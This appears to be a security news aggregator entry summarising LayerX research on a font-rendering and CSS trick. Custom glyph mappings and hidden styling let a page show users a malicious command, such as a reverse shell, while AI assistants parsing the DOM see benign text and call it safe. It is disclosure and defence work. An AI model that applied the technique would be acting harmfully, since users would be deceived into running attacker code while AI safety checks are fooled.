Font-rendering spoofing bypasses AI assistant input validation via glyph substitution
Summary
Hide ▲
Show ▼
A novel attack abuses font-rendering and CSS techniques to present visually distinct malicious commands to end users while hiding them from AI assistants, enabling social-engineering-driven command execution. Attackers craft malicious instructions encoded in custom glyph mappings and concealed via CSS (font size, foreground/background color matching, or near-zero opacity), making the payload invisible to text-based AI parsers while rendering clearly to users. Users visiting a malicious page are tricked into executing the hidden payload (e.g., reverse-shell initiation) under the guise of legitimate rewards. AI assistants analyzing only the DOM or raw HTML receive a sanitized view and incorrectly deem the instructions safe, reinforcing erroneous trust.
Timeline
-
17.03.2026 15:59 1 articles · 2h ago
Font-rendering spoofing attack evades AI assistants by hiding payloads in visual layer
A browser-based attack uses custom fonts and CSS to display malicious commands to users while hiding them from AI parsers that analyze only the DOM or raw HTML. The technique was demonstrated via a proof-of-concept page promising a game easter egg, with the payload visible to the user but ignored by the AI assistant due to encoding and visual obfuscation. Vendors largely dismissed the risk as requiring social engineering, except Microsoft, which addressed the issue internally.
Show sources
- New font-rendering trick hides malicious commands from AI tools — www.bleepingcomputer.com — 17.03.2026 15:59
Information Snippets
-
Attack leverages custom font glyph substitution to remap characters, combined with CSS techniques (color matching, extreme font size, or near-zero opacity) to visually render malicious commands while concealing them from AI assistant text parsers.
First reported: 17.03.2026 15:591 source, 1 articleShow sources
- New font-rendering trick hides malicious commands from AI tools — www.bleepingcomputer.com — 17.03.2026 15:59
-
PoC by LayerX demonstrated successful evasion against multiple AI assistants (ChatGPT, Claude, Copilot, Gemini, Leo, Grok, Perplexity, Sigma, Dia, Fellou, Genspark) as of December 2025 via a fake Bioshock easter-egg page. The AI tools analyzed sanitized HTML, whereas the browser rendered the malicious payload to the user.
First reported: 17.03.2026 15:591 source, 1 articleShow sources
- New font-rendering trick hides malicious commands from AI tools — www.bleepingcomputer.com — 17.03.2026 15:59
-
Microsoft addressed the issue internally after LayerX’s disclosure; Google initially accepted but later closed the report, citing limited harm and reliance on social engineering.
First reported: 17.03.2026 15:591 source, 1 articleShow sources
- New font-rendering trick hides malicious commands from AI tools — www.bleepingcomputer.com — 17.03.2026 15:59
-
Researchers recommend LLM vendors extend parsing to compare rendered visual output against DOM content, treat fonts as an attack surface, and scan for CSS hiding techniques such as foreground/background color parity, small fonts, and near-zero opacity.
First reported: 17.03.2026 15:591 source, 1 articleShow sources
- New font-rendering trick hides malicious commands from AI tools — www.bleepingcomputer.com — 17.03.2026 15:59